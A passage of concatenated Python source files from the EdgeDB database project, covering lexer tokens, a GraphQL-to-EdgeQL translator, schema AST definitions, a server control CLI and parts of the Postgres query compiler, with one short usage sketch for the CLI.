class T_RBRACKET(Token, lextoken=']'):
pass
class T_LPAREN(Token, lextoken='('):
pass
class T_RPAREN(Token, lextoken=')'):
pass
class T_LBRACE(Token, lextoken='{'):
pass
class T_RBRACE(Token, lextoken='}'):
pass
class T_DOUBLECOLON(Token, lextoken='::'):
pass
class T_DOUBLEQMARK(Token, lextoken='??'):
pass
class T_COLON(Token, lextoken=':'):
pass
class T_SEMICOLON(Token, lextoken=';'):
pass
class T_COMMA(Token, lextoken=','):
pass
class T_PLUS(Token, lextoken='+'):
pass
class T_MINUS(Token, lextoken='-'):
pass
class T_STAR(Token, lextoken='*'):
pass
class T_SLASH(Token, lextoken='/'):
pass
class T_PERCENT(Token, lextoken='%'):
pass
class T_CIRCUMFLEX(Token, lextoken='^'):
pass
class T_AT(Token, lextoken='@'):
pass
class T_DOLLAR(Token, lextoken='$'):
pass
class T_TURNSTILE(Token):
pass
class T_ARROW(Token):
pass
class T_LANGBRACKET(Token, lextoken='<'):
pass
class T_RANGBRACKET(Token, lextoken='>'):
pass
class T_EQUALS(Token, lextoken='='):
pass
class T_ICONST(Token):
pass
class T_FCONST(Token):
pass
class T_SCONST(Token):
def __init__(self, parser, val, context=None):
super().__init__(parser, val, context)
# the process of string normalization is slightly different for
# regular '-quoted strings and $$-quoted ones
if val[0] in ("'", '"'):
self.string = clean_string.sub('', val[1:-1].replace(
R"\'", "'").replace(R'\"', '"'))
else:
# Because of implicit string concatenation there may
# be more than one pair of dollar quotes in the val.
# We want to grab every other chunk from splitting the
# val with the quote.
quote = string_quote.match(val).group(0)
self.string = ''.join((
part for n, part in enumerate(val.split(quote))
if n % 2 == 1))
class T_IDENT(Token):
pass
class T_OP(Token):
pass
def _gen_keyword_tokens():
# Define keyword tokens
mod = sys.modules[__name__]
def clsexec(ns):
ns['__module__'] = __name__
return ns
for val, (token, typ) in keywords.edgeql_keywords.items():
clsname = 'T_{}'.format(token)
clskwds = dict(metaclass=parsing.TokenMeta, token=token)
cls = types.new_class(clsname, (Token,), clskwds, clsexec)
setattr(mod, clsname, cls)
_gen_keyword_tokens()
```
#### File: lang/graphql/translator.py
```python
from collections import namedtuple
from graphql import graphql as gql_proc, GraphQLString, GraphQLID
import json
import re
from edb.lang import edgeql
from edb.lang.common import ast
from edb.lang.edgeql import ast as qlast
from edb.lang.graphql import ast as gqlast, parser as gqlparser
from edb.lang.schema import error as s_error
from . import types as gt
from .errors import GraphQLValidationError, GraphQLCoreError
class GraphQLTranslatorContext:
def __init__(self, *, schema, gqlcore, variables, operation_name, query):
self.schema = schema
self.variables = variables
self.operation_name = operation_name
self.fragments = {}
self.validated_fragments = {}
self.vars = {}
self.fields = []
self.path = []
self.filter = None
self.include_base = [False]
self.gql_schema = gt.Schema(gqlcore)
self.gqlcore_schema = gqlcore._gql_schema
self.query = query
Step = namedtuple('Step', ['name', 'type'])
Field = namedtuple('Field', ['name', 'value'])
class GraphQLTranslator(ast.NodeVisitor):
def get_type(self, name, *, context=None):
# the type may be from the EdgeDB schema or some special
# GraphQL type/adapter
assert isinstance(name, str)
try:
return self._context.gql_schema.get(name)
except s_error.SchemaError:
if context:
raise GraphQLValidationError(
f"{name!r} does not exist in the schema",
context=context)
raise
def get_field_type(self, base, name, *, args=None, context=None):
try:
target = base.get_field_type(name, args)
except s_error.SchemaError:
if not context:
raise
target = None
if target is None:
if context:
raise GraphQLValidationError(
f"field {name!r} is " +
f"invalid for {base.short_name}",
context=context)
return target
def visit_Document(self, node):
# we need to index all of the fragments before we process operations
self._context.fragments = {
f.name: f for f in node.definitions
if isinstance(f, gqlast.FragmentDefinition)
}
gqlresult = gql_proc(
self._context.gqlcore_schema,
self._context.query,
variable_values={
name[1:]: val for name, val in self._context.variables.items()
},
operation_name=self._context.operation_name,
)
if gqlresult.errors:
for err in gqlresult.errors:
raise GraphQLCoreError(
err.message,
line=err.locations[0].line,
col=err.locations[0].column,
)
translated = dict(
d for d in self.visit(node.definitions) if d is not None)
eql = next(v for v in translated.values())
for el in eql[0].result.elements:
# swap in the json bits
if (isinstance(el.compexpr, qlast.TypeCast) and
el.compexpr.type.maintype.name == 'json'):
name = el.expr.steps[0].ptr.name
el.compexpr.expr.value = json.dumps(
gqlresult.data[name], indent=4)
return translated
def visit_FragmentDefinition(self, node):
# fragments are already processed, no need to do anything here
return None
def visit_OperationDefinition(self, node):
# create a dict of variables that will be marked as
# critical or not
self._context.vars = {
name: [val, False]
for name, val in self._context.variables.items()}
opname = None
if (self._context.operation_name and
node.name != self._context.operation_name):
return None
if node.type is None or node.type == 'query':
stmt = self._visit_query(node)
if node.name:
opname = f'query {node.name}'
elif node.type == 'mutation':
stmt = self._visit_mutation(node)
if node.name:
opname = f'mutation {node.name}'
else:
raise ValueError(f'unsupported definition type: {node.type!r}')
# produce the list of variables critical to the shape
# of the query
critvars = [(name, val) for name, (val, crit)
in self._context.vars.items() if crit]
critvars.sort()
return (opname, (stmt, critvars))
def _visit_query(self, node):
# populate input variables with defaults, where applicable
if node.variables:
self.visit(node.variables)
# base Query needs to be configured specially
base = self._context.gql_schema.get('Query')
# special treatment of the selection_set, different from inner
# recursion
query = qlast.SelectQuery(
result=qlast.Shape(
expr=qlast.Path(
steps=[qlast.ObjectRef(name='Query', module='graphql')]
),
elements=[]
),
)
self._context.fields.append({})
self._context.path.append([Step(None, base)])
query.result.elements = self.visit(node.selection_set)
self._context.fields.pop()
self._context.path.pop()
return query
def _visit_mutation(self, node):
raise NotImplementedError
def _should_include(self, directives):
for directive in directives:
if directive.name in ('include', 'skip'):
cond = [a.value for a in directive.arguments
if a.name == 'if'][0]
if isinstance(cond, gqlast.Variable):
var = self._context.vars[cond.value]
cond = var[0]
var[1] = True # mark the variable as critical
else:
cond = cond.value
if not isinstance(cond, bool):
raise GraphQLValidationError(
f"'if' argument of {directive.name} " +
"directive must be a Boolean",
context=directive.context)
if directive.name == 'include' and cond is False:
return False
elif directive.name == 'skip' and cond is True:
return False
return True
def visit_VariableDefinition(self, node):
variables = self._context.vars
if not variables.get(node.name):
if node.value is None:
variables[node.name] = [None, False]
else:
variables[node.name] = [node.value.topython(), False]
def visit_SelectionSet(self, node):
elements = []
for sel in node.selections:
if not self._should_include(sel.directives):
continue
spec = self.visit(sel)
if spec is not None:
elements.append(spec)
elements = self.combine_field_results(elements)
return elements
def _is_duplicate_field(self, node):
# if this field is a duplicate, that is not identical to the
# original, throw an exception
name = node.alias or node.name
dup = self._context.fields[-1].get(name)
if dup:
return True
else:
self._context.fields[-1][name] = node
return False
# XXX: this might need to be trimmed
def _is_top_level_field(self, node, fail=None):
top = False
path = self._context.path[-1]
# there is different handling of top-level, built-in and inner
# fields
top = (len(self._context.path) == 1 and
len(path) == 1 and
path[0].name is None)
prevt = path[-1].type
target = self.get_field_type(
prevt, node.name,
args={
arg.name: self._get_field_arg_value(arg)
for arg in node.arguments
},
context=node.context)
path.append(Step(name=node.name, type=target))
if not top and fail:
raise GraphQLValidationError(
f"field {node.name!r} can only appear at the top-level Query",
context=node.context)
return top
def _get_field_arg_value(self, arg):
if isinstance(arg.value, gqlast.Variable):
return self._context.vars[arg.value.value]
elif isinstance(arg.value, gqlast.InputObjectLiteral):
# this value only matters for introspection, but
# introspection can never have an InputObjectLiteral
return {}
else:
return arg.value.topython()
def _get_parent_and_current_type(self):
path = self._context.path[-1]
cur = path[-1].type
if len(path) > 1:
par = path[-2].type
else:
par = self._context.path[-2][-1].type
return par, cur
def _prepare_field(self, node):
path = self._context.path[-1]
include_base = self._context.include_base[-1]
is_top = self._is_top_level_field(node)
spath = self._context.path[-1]
prevt, target = self._get_parent_and_current_type()
# insert normal or specialized link
steps = []
if include_base:
base = spath[0].type
steps.append(qlast.ObjectRef(
module=base.module, name=base.short_name))
steps.append(qlast.Ptr(
ptr=qlast.ObjectRef(
name=node.name
)
))
return is_top, path, prevt, target, steps
def visit_Field(self, node):
if self._is_duplicate_field(node):
return
is_top, path, prevt, target, steps = \
self._prepare_field(node)
json_mode = False
# determine if there needs to be extra subqueries
if not prevt.dummy and target.dummy:
json_mode = True
# this is a special introspection type
eql, shape, filterable = target.get_template()
spec = qlast.ShapeElement(
expr=qlast.Path(
steps=[qlast.Ptr(
ptr=qlast.ObjectRef(
name=node.alias or node.name
)
)]
),
compexpr=eql,
)
elif prevt.is_field_shadowed(node.name):
if prevt.has_native_field(node.name) and not node.alias:
spec = filterable = shape = qlast.ShapeElement(
expr=qlast.Path(steps=steps),
)
else:
prefix = qlast.Path(steps=self.get_path_prefix(-1))
eql, shape, filterable = prevt.get_field_template(
node.name,
parent=prefix,
has_shape=bool(node.selection_set)
)
spec = qlast.ShapeElement(
expr=qlast.Path(
steps=[qlast.Ptr(
ptr=qlast.ObjectRef(
# this is already a sub-query
name=node.alias or node.name
)
)]
),
compexpr=eql
)
else:
# if the parent is NOT a shadowed type, we need an explicit SELECT
eql, shape, filterable = target.get_template()
spec = qlast.ShapeElement(
expr=qlast.Path(
steps=[qlast.Ptr(
ptr=qlast.ObjectRef(
# this is already a sub-query
name=node.alias or node.name
)
)]
),
compexpr=eql
)
if node.selection_set is not None:
if json_mode:
pass
else:
# a single recursion target, so we can process
# selection set now
self._context.fields.append({})
vals = self.visit(node.selection_set)
self._context.fields.pop()
if shape:
shape.elements = vals
if filterable:
where, orderby, offset, limit = \
self._visit_arguments(node.arguments)
filterable.where = where
filterable.orderby = orderby
filterable.offset = offset
filterable.limit = limit
path.pop()
return spec
def visit_InlineFragment(self, node):
self._validate_fragment_type(node, node)
result = self.visit(node.selection_set)
if node.on is not None:
self._context.path.pop()
return result
def visit_FragmentSpread(self, node):
frag = self._context.fragments[node.name]
self._validate_fragment_type(frag, node)
# in case of secondary type, recurse into a copy to avoid
# memoized results
selection_set = frag.selection_set
result = self.visit(selection_set)
self._context.path.pop()
return result
def _validate_fragment_type(self, frag, spread):
is_specialized = False
base_type = None
# validate the fragment type w.r.t. the base
if frag.on is None:
return
# validate the base if it's nested
if len(self._context.path) > 0:
path = self._context.path[-1]
base_type = path[-1].type
frag_type = self.get_type(frag.on)
if base_type.issubclass(frag_type):
# legal hierarchy, no change
pass
elif frag_type.issubclass(base_type):
# specialized link, but still legal
is_specialized = True
else:
raise GraphQLValidationError(
f"{base_type.short_name} and {frag_type.short_name} " +
"are not related", context=spread.context)
self._context.path.append([Step(frag.on, frag_type)])
self._context.include_base.append(is_specialized)
def _visit_arguments(self, arguments):
where = offset = limit = None
orderby = []
for arg in arguments:
if arg.name == 'filter':
where = self.visit(arg.value)
elif arg.name == 'order':
orderby = self.visit_order(arg.value)
return where, orderby, offset, limit
def get_path_prefix(self, end_trim=None):
# flatten the path
path = [step
for psteps in self._context.path
for step in psteps]
# find the first shadowed root
for i, step in enumerate(path):
base = step.type
if base.shadow:
break
# trim the rest of the path
path = path[i + 1:end_trim]
prefix = [
qlast.ObjectRef(module=base.module, name=base.short_name)
]
prefix.extend(
qlast.Ptr(ptr=qlast.ObjectRef(name=step.name))
for step in path
)
return prefix
def visit_ListLiteral(self, node):
return qlast.Array(elements=self.visit(node.value))
def visit_InputObjectLiteral(self, node):
# this represents some expression to be used in filter
result = []
for field in node.value:
result.append(self.visit(field))
return self._join_expressions(result)
def visit_ObjectField(self, node):
fname = node.name
# handle boolean ops
if fname == 'and':
return self._visit_list_of_inputs(node.value.value, ast.ops.AND)
elif fname == 'or':
return self._visit_list_of_inputs(node.value.value, ast.ops.OR)
elif fname == 'not':
return qlast.UnaryOp(op=ast.ops.NOT,
operand=self.visit(node.value))
# handle various scalar ops
op = gt.GQL_TO_OPS_MAP.get(fname)
if op:
value = self.visit(node.value)
return qlast.BinOp(left=self._context.filter, op=op, right=value)
# we're at the beginning of a scalar op
_, target = self._get_parent_and_current_type()
name = self.get_path_prefix()
name.append(qlast.Ptr(ptr=qlast.ObjectRef(name=fname)))
name = qlast.Path(steps=name)
# potentially need to cast the 'name' side into a <str>, so as
# to be compatible with the 'value'
typename = target.get_field_type(fname).short_name
if (typename != 'str' and
gt.EDB_TO_GQL_SCALARS_MAP[typename] in {GraphQLString,
GraphQLID}):
name = qlast.TypeCast(
expr=name,
type=qlast.TypeName(maintype=qlast.ObjectRef(name='str')),
)
self._context.filter = name
return self.visit(node.value)
def visit_order(self, node):
# if there is no specific ordering, then order by id
if not node.value:
return [qlast.SortExpr(
path=qlast.Path(
steps=[qlast.Ptr(ptr=qlast.ObjectRef(name='id'))],
partial=True,
),
direction=qlast.SortAsc,
)]
# Ordering is handled by specifying a list of special Ordering objects.
# Validation is already handled by this point.
orderby = []
for enum in node.value:
name, direction, nulls = self._visit_order_item(enum)
orderby.append(qlast.SortExpr(
path=qlast.Path(
steps=[qlast.Ptr(ptr=qlast.ObjectRef(name=name))],
partial=True,
),
direction=direction,
nones_order=nulls,
))
return orderby
def _visit_order_item(self, node):
name = node.name
direction = nulls = None
for part in node.value.value:
if part.name == 'dir':
direction = part.value.value
if part.name == 'nulls':
nulls = part.value.value
# direction is a required field, so we can rely on it having
# one of two values
if direction == 'ASC':
direction = qlast.SortAsc
# nulls are optional, but are 'SMALLEST' by default
if nulls == 'BIGGEST':
nulls = qlast.NonesLast
else:
nulls = qlast.NonesFirst
else: # DESC
direction = qlast.SortDesc
# nulls are optional, but are 'SMALLEST' by default
if nulls == 'BIGGEST':
nulls = qlast.NonesFirst
else:
nulls = qlast.NonesLast
return name, direction, nulls
def visit_Variable(self, node):
return qlast.Parameter(name=node.value[1:])
def visit_Literal(self, node):
return qlast.Constant(value=node.value)
def _visit_list_of_inputs(self, inputs, op):
result = [self.visit(node) for node in inputs]
return self._join_expressions(result, op)
def _join_expressions(self, exprs, op=ast.ops.AND):
if not exprs:
return None
elif len(exprs) == 1:
return exprs[0]
result = qlast.BinOp(
left=exprs[0],
op=op,
right=exprs[1]
)
for expr in exprs[2:]:
result = qlast.BinOp(
left=result,
op=op,
right=expr
)
return result
def combine_field_results(self, results, *, flatten=True):
if flatten:
flattened = []
for res in results:
if isinstance(res, Field):
flattened.append(res)
elif ast.is_container(res):
flattened.extend(res)
else:
flattened.append(res)
return flattened
else:
return results
def translate(schema, graphql, *, variables=None, operation_name=None):
if variables is None:
variables = {}
# HACK
query = re.sub(r'@edgedb\(.*?\)', '', graphql)
schema2 = gt.GQLCoreSchema(schema)
parser = gqlparser.GraphQLParser()
gqltree = parser.parse(graphql)
context = GraphQLTranslatorContext(
schema=schema, gqlcore=schema2, query=query,
variables=variables, operation_name=operation_name)
edge_forest_map = GraphQLTranslator(context=context).visit(gqltree)
code = []
for name, (tree, critvars) in sorted(edge_forest_map.items()):
if name:
code.append(f'# {name}')
if critvars:
crit = [f'{vname}={val!r}' for vname, val in critvars]
code.append(f'# critical variables: {", ".join(crit)}')
code += [edgeql.generate_source(tree), ';']
return '\n'.join(code)
```
#### File: lang/schema/ast.py
```python
import typing
from edb.lang.common import enum as s_enum
from edb.lang.common import ast, parsing
from edb.lang.edgeql import ast as qlast
class Base(ast.AST):
__ast_hidden__ = {'context'}
context: parsing.ParserContext
def _extra_repr(self):
return ''
def __repr__(self):
ar = self._extra_repr()
return '<{}.{} at {:#x}{}>'.format(self.__class__.ns,
self.__class__.__name__,
id(self),
ar)
class Spec(Base):
inherited: bool = False
class Attribute(Spec):
name: qlast.ObjectRef
value: qlast.Base
class Policy(Spec):
__fields = ['event', 'action'] # TODO: type this
class Constraint(Spec):
args: typing.List[qlast.FuncArg]
attributes: typing.List[Attribute]
delegated: bool = False
name: qlast.ObjectRef
subject: typing.Optional[qlast.Expr]
class Pointer(Spec):
name: qlast.ObjectRef
# Computable links don't have a target
target: typing.Optional[typing.List[qlast.TypeName]]
attributes: typing.List[Attribute]
constraints: typing.List[Constraint]
policies: typing.List[Policy]
required: bool = False
# Expression of a computable link
expr: qlast.Base = None
class Index(Spec):
name: qlast.ObjectRef
expression: qlast.Base
class Property(Pointer):
pass
class Link(Pointer):
properties: typing.List[Property]
# # XXX: to be killed
# class Property(Property):
# pass
class Declaration(Base):
name: str
extends: typing.List[qlast.TypeName]
attributes: typing.List[Attribute]
class ActionDeclaration(Declaration):
pass
class ScalarTypeDeclaration(Declaration):
abstract: bool = False
final: bool = False
constraints: typing.List[Constraint]
class AttributeDeclaration(Declaration):
type: typing.Optional[qlast.TypeName]
class ObjectTypeDeclaration(Declaration):
abstract: bool = False
final: bool = False
links: typing.List[Link]
properties: typing.List[Property]
indexes: typing.List[Index]
constraints: typing.List[Constraint]
class ConstraintDeclaration(Declaration):
abstract: bool = False
args: typing.List[qlast.Base]
subject: typing.Optional[qlast.Expr]
class EventDeclaration(Declaration):
pass
class ViewDeclaration(Declaration):
pass
class Language(s_enum.StrEnum):
SQL = 'SQL'
EdgeQL = 'EDGEQL'
class FunctionCode(Base):
language: Language
code: qlast.Base
from_name: str
class FunctionDeclaration(Declaration):
args: list
returning: qlast.TypeName
aggregate: bool = False
initial_value: qlast.Base
code: FunctionCode
set_returning: str = ''
class BasePointerDeclaration(Declaration):
abstract: bool = False
indexes: typing.List[Index]
constraints: typing.List[Constraint]
policies: typing.List[Policy]
class PropertyDeclaration(BasePointerDeclaration):
pass
class LinkDeclaration(BasePointerDeclaration):
properties: typing.List[Property]
class Import(Base):
modules: list
class ImportModule(Base):
module: str
alias: str = None
class Schema(Base):
# TODO: Remove union type
declarations: typing.List[typing.Union[Declaration, Import]]
```
#### File: server/ctl/__init__.py
```python
import argparse
import sys
from . import init as init_mod
def main(argv=sys.argv[1:], env=None):
parser = argparse.ArgumentParser(description='EdgeDB Server Control')
backend_info = parser.add_mutually_exclusive_group(required=True)
backend_info.add_argument(
'-D', '--data-dir', type=str, help='database cluster directory')
backend_info.add_argument(
'-P', '--postgres', type=str,
help='address of Postgres backend server')
parser.add_argument(
'--postgres-superuser', type=str, default='postgres', metavar='ROLE',
help='name of Postgres superuser role (use with --postgres)')
sub = parser.add_subparsers(title='control commands', dest='command')
sub.required = True
sub.add_parser('init', help='initialize EdgeDB cluster')
args = parser.parse_args(argv)
if args.command == 'init':
init_mod.main(args, env)
if __name__ == '__main__':
main()
```
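A hedged invocation sketch for the entry point above; it assumes the package is importable as `edb.server.ctl` (mirroring the `edb.server` imports used elsewhere in this repo), and the data directory path is purely illustrative:

```python
# Hypothetical programmatic invocation; the import path and the data
# directory below are assumptions, not values confirmed by the source.
from edb.server.ctl import main

# Equivalent to running the CLI with: -D /srv/edgedb-data init
main(['-D', '/srv/edgedb-data', 'init'])
```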
#### File: pgsql/compiler/dbobj.py
```python
import typing
from edb.lang.ir import ast as irast
from edb.lang.schema import objtypes as s_objtypes
from edb.lang.schema import links as s_links
from edb.lang.schema import objects as s_obj
from edb.lang.schema import pointers as s_pointers
from edb.server.pgsql import ast as pgast
from edb.server.pgsql import common
from edb.server.pgsql import types as pgtypes
from . import context
def range_for_material_objtype(
objtype: s_objtypes.ObjectType,
path_id: irast.PathId, *,
include_overlays: bool=True,
env: context.Environment) -> pgast.BaseRangeVar:
from . import pathctx # XXX: fix cycle
objtype = objtype.material_type()
table_schema_name, table_name = common.objtype_name_to_table_name(
objtype.name, catenate=False)
if objtype.name.module == 'schema':
# Redirect all queries to schema tables to edgedbss
table_schema_name = 'edgedbss'
relation = pgast.Relation(
schemaname=table_schema_name,
name=table_name,
path_id=path_id,
)
rvar = pgast.RangeVar(
relation=relation,
alias=pgast.Alias(
aliasname=env.aliases.get(objtype.name.name)
)
)
overlays = env.rel_overlays.get(objtype.name)
if overlays and include_overlays:
set_ops = []
qry = pgast.SelectStmt()
qry.from_clause.append(rvar)
pathctx.put_path_value_rvar(qry, path_id, rvar, env=env)
qry.path_scope.add(path_id)
set_ops.append(('union', qry))
for op, cte in overlays:
rvar = pgast.RangeVar(
relation=cte,
alias=pgast.Alias(
aliasname=env.aliases.get(hint=cte.name)
)
)
qry = pgast.SelectStmt(
from_clause=[rvar],
)
pathctx.put_path_value_rvar(qry, path_id, rvar, env=env)
qry.path_scope.add(path_id)
if op == 'replace':
op = 'union'
set_ops = []
set_ops.append((op, qry))
rvar = range_from_queryset(set_ops, objtype, env=env)
return rvar
def range_for_objtype(
objtype: s_objtypes.ObjectType,
path_id: irast.PathId, *,
include_overlays: bool=True,
env: context.Environment) -> pgast.BaseRangeVar:
from . import pathctx # XXX: fix cycle
if not objtype.is_virtual:
rvar = range_for_material_objtype(
objtype, path_id, include_overlays=include_overlays, env=env)
else:
# Union object types are represented as a UNION of selects
# from their children, which is, for most purposes, equivalent
# to SELECTing from a parent table.
children = frozenset(objtype.children(env.schema))
set_ops = []
for child in children:
c_rvar = range_for_objtype(
child, path_id=path_id,
include_overlays=include_overlays, env=env)
qry = pgast.SelectStmt(
from_clause=[c_rvar],
)
pathctx.put_path_value_rvar(qry, path_id, c_rvar, env=env)
qry.path_scope.add(path_id)
set_ops.append(('union', qry))
rvar = range_from_queryset(set_ops, objtype, env=env)
rvar.query.is_distinct = True
rvar.query.path_id = path_id
return rvar
def range_for_set(
ir_set: irast.Set, *,
include_overlays: bool=True,
env: context.Environment) -> pgast.BaseRangeVar:
rvar = range_for_objtype(
ir_set.scls, ir_set.path_id,
include_overlays=include_overlays, env=env)
return rvar
def table_from_ptrcls(
ptrcls: s_links.Link, *,
env: context.Environment) -> pgast.RangeVar:
"""Return a Table corresponding to a given Link."""
table_schema_name, table_name = common.get_table_name(
ptrcls, catenate=False)
pname = ptrcls.shortname
if pname.module == 'schema':
# Redirect all queries to schema tables to edgedbss
table_schema_name = 'edgedbss'
relation = pgast.Relation(
schemaname=table_schema_name, name=table_name)
rvar = pgast.RangeVar(
relation=relation,
alias=pgast.Alias(
aliasname=env.aliases.get(pname.name)
)
)
return rvar
def range_for_ptrcls(
ptrcls: s_links.Link, direction: s_pointers.PointerDirection, *,
include_overlays: bool=True,
env: context.Environment) -> pgast.BaseRangeVar:
""""Return a Range subclass corresponding to a given ptr step.
If `ptrcls` is a generic link, then a simple RangeVar is returned,
otherwise the return value may potentially be a UNION of all tables
corresponding to a set of specialized links computed from the given
`ptrcls` taking source inheritance into account.
"""
linkname = ptrcls.shortname
endpoint = ptrcls.source
tgt_col = pgtypes.get_pointer_storage_info(
ptrcls, resolve_type=False, link_bias=True).column_name
cols = [
'std::source',
tgt_col
]
set_ops = []
ptrclses = set()
for source in {endpoint} | set(endpoint.descendants(env.schema)):
# Sift through the descendants to see who has this link
try:
src_ptrcls = source.pointers[linkname].material_type()
except KeyError:
# This source has no such link, skip it
continue
else:
if src_ptrcls in ptrclses:
# Seen this link already
continue
ptrclses.add(src_ptrcls)
table = table_from_ptrcls(src_ptrcls, env=env)
qry = pgast.SelectStmt()
qry.from_clause.append(table)
qry.rptr_rvar = table
# Make sure all property references are pulled up properly
for colname in cols:
selexpr = pgast.ColumnRef(
name=[table.alias.aliasname, colname])
qry.target_list.append(
pgast.ResTarget(val=selexpr, name=colname))
set_ops.append(('union', qry))
overlays = env.rel_overlays.get(src_ptrcls.shortname)
if overlays and include_overlays:
for op, cte in overlays:
rvar = pgast.RangeVar(
relation=cte,
alias=pgast.Alias(
aliasname=env.aliases.get(cte.name)
)
)
qry = pgast.SelectStmt(
target_list=[
pgast.ResTarget(
val=pgast.ColumnRef(
name=[col]
)
)
for col in cols
],
from_clause=[rvar],
)
set_ops.append((op, qry))
rvar = range_from_queryset(set_ops, ptrcls, env=env)
return rvar
def range_for_pointer(
pointer: s_links.Link, *,
env: context.Environment) -> pgast.BaseRangeVar:
ptrcls = pointer.ptrcls
if ptrcls.derived_from is not None:
ptrcls = ptrcls.get_nearest_non_derived_parent()
return range_for_ptrcls(ptrcls, pointer.direction, env=env)
def range_from_queryset(
set_ops: typing.Sequence[typing.Tuple[str, pgast.BaseRelation]],
scls: s_obj.Object, *,
env: context.Environment) -> pgast.BaseRangeVar:
if len(set_ops) > 1:
# More than one class table, generate a UNION/EXCEPT clause.
qry = pgast.SelectStmt(
all=True,
larg=set_ops[0][1]
)
for op, rarg in set_ops[1:]:
qry.op, qry.rarg = op, rarg
qry = pgast.SelectStmt(
all=True,
larg=qry
)
qry = qry.larg
rvar = pgast.RangeSubselect(
subquery=qry,
alias=pgast.Alias(
aliasname=env.aliases.get(scls.shortname.name)
)
)
else:
# Just one class table, so return it directly
rvar = set_ops[0][1].from_clause[0]
return rvar
def get_column(
rvar: pgast.BaseRangeVar,
colspec: typing.Union[str, pgast.ColumnRef], *,
optional: bool=False, nullable: bool=None) -> pgast.ColumnRef:
if isinstance(colspec, pgast.ColumnRef):
colname = colspec.name[-1]
if nullable is None:
nullable = colspec.nullable
optional = colspec.optional
else:
colname = colspec
if nullable is None:
# Assume the column is nullable unless told otherwise.
nullable = True
if rvar is None:
name = [colname]
else:
name = [rvar.alias.aliasname, colname]
return pgast.ColumnRef(name=name, nullable=nullable, optional=optional)
def rvar_for_rel(
rel: pgast.BaseRelation, *,
lateral: bool=False, colnames: typing.List[str]=[],
env: context.Environment) -> pgast.BaseRangeVar:
if isinstance(rel, pgast.Query):
alias = env.aliases.get(rel.name or 'q')
rvar = pgast.RangeSubselect(
subquery=rel,
alias=pgast.Alias(aliasname=alias, colnames=colnames),
lateral=lateral,
)
else:
alias = env.aliases.get(rel.name)
rvar = pgast.RangeVar(
relation=rel,
alias=pgast.Alias(aliasname=alias, colnames=colnames)
)
return rvar
def get_rvar_var(
rvar: typing.Optional[pgast.BaseRangeVar], var: pgast.OutputVar,
*, optional: bool=False, nullable: bool=None) \
-> typing.Union[pgast.ColumnRef, pgast.TupleVar]:
assert isinstance(var, pgast.OutputVar)
if isinstance(var, pgast.TupleVar):
elements = []
for el in var.elements:
val = get_rvar_var(rvar, el.name)
elements.append(
pgast.TupleElement(
path_id=el.path_id, name=el.name, val=val))
fieldref = pgast.TupleVar(elements, named=var.named)
else:
fieldref = get_column(rvar, var, optional=optional,
nullable=nullable)
return fieldref
def add_rel_overlay(
scls: s_objtypes.ObjectType, op: str, rel: pgast.BaseRelation, *,
env: context.Environment) -> None:
overlays = env.rel_overlays[scls.name]
overlays.append((op, rel))
def cte_for_query(
rel: pgast.Query, *,
env: context.Environment) -> pgast.CommonTableExpr:
return pgast.CommonTableExpr(
query=rel,
alias=pgast.Alias(
aliasname=env.aliases.get(rel.name)
)
)
def cols_for_pointer(
pointer: s_pointers.Pointer, *,
env: context.Environment) -> typing.List[str]:
cols = ['ptr_item_id']
if isinstance(pointer, s_links.Link):
for ptr in pointer.pointers.values():
cols.append(common.edgedb_name_to_pg_name(ptr.shortname))
else:
cols.extend(('std::source', 'std::target'))
return cols
```
#### File: pgsql/compiler/output.py
```python
from edb.server.pgsql import ast as pgast
from . import context
def tuple_var_as_json_object(tvar, *, env):
if not tvar.named:
return pgast.FuncCall(
name=('jsonb_build_array',),
args=[serialize_expr(t.val, nested=True, env=env)
for t in tvar.elements],
null_safe=True, nullable=tvar.nullable)
else:
keyvals = []
for element in tvar.elements:
rptr = element.path_id.rptr()
if rptr is None:
name = element.path_id[-1].name.name
else:
name = rptr.shortname.name
if rptr.is_link_property():
name = '@' + name
keyvals.append(pgast.Constant(val=name))
if isinstance(element.val, pgast.TupleVar):
val = serialize_expr(element.val, env=env)
else:
val = element.val
keyvals.append(val)
return pgast.FuncCall(
name=('jsonb_build_object',),
args=keyvals, null_safe=True, nullable=tvar.nullable)
def in_serialization_ctx(ctx: context.CompilerContextLevel) -> bool:
return ctx.expr_exposed is None or ctx.expr_exposed
def output_as_value(
expr: pgast.Base, *,
env: context.Environment) -> pgast.Base:
if isinstance(expr, pgast.TupleVar):
val = pgast.ImplicitRowExpr(args=[
output_as_value(e.val, env=env) for e in expr.elements
])
else:
val = expr
return val
def serialize_expr_if_needed(
expr: pgast.Base, *,
ctx: context.CompilerContextLevel) -> pgast.Base:
if in_serialization_ctx(ctx):
val = serialize_expr(expr, env=ctx.env)
else:
val = expr
return val
def serialize_expr(
expr: pgast.Base, *,
nested: bool=False,
env: context.Environment) -> pgast.Base:
if env.output_format == context.OutputFormat.JSON:
if isinstance(expr, pgast.TupleVar):
val = tuple_var_as_json_object(expr, env=env)
elif isinstance(expr, pgast.ImplicitRowExpr):
val = pgast.FuncCall(
name=('jsonb_build_array',), args=expr.args,
null_safe=True)
elif not nested:
val = pgast.FuncCall(
name=('to_jsonb',), args=[expr], null_safe=True)
else:
val = expr
elif env.output_format == context.OutputFormat.NATIVE:
val = output_as_value(expr, env=env)
else:
raise RuntimeError(f'unexpected output format: {env.output_format!r}')
return val
def top_output_as_value(
stmt: pgast.Query, *,
env: context.Environment) -> pgast.Query:
"""Finalize output serialization on the top level."""
if env.output_format == context.OutputFormat.JSON:
# For JSON we just want to aggregate the whole thing
# into a JSON array.
subrvar = pgast.RangeSubselect(
subquery=stmt,
alias=pgast.Alias(
aliasname=env.aliases.get('aggw')
)
)
stmt_res = stmt.target_list[0]
if stmt_res.name is None:
stmt_res.name = env.aliases.get('v')
new_val = pgast.FuncCall(
name=('json_agg',),
args=[pgast.ColumnRef(name=[stmt_res.name])]
)
new_val = pgast.CoalesceExpr(
args=[
new_val,
pgast.Constant(val='[]')
]
)
result = pgast.SelectStmt(
target_list=[
pgast.ResTarget(
val=new_val
)
],
from_clause=[
subrvar
]
)
result.ctes = stmt.ctes
stmt.ctes = []
return result
else:
return stmt
```
#### File: pgsql/compiler/relctx.py
```python
import typing
from edb.lang.ir import ast as irast
from edb.lang.ir import utils as irutils
from edb.lang.schema import links as s_links
from edb.lang.schema import objtypes as s_objtypes
from edb.lang.schema import pointers as s_pointers
from edb.server.pgsql import ast as pgast
from edb.server.pgsql import common
from edb.server.pgsql import types as pg_types
from . import astutils
from . import context
from . import dbobj
from . import pathctx
def pull_path_namespace(
*, target: pgast.Query, source: pgast.BaseRangeVar,
replace_bonds: bool=True, ctx: context.CompilerContextLevel):
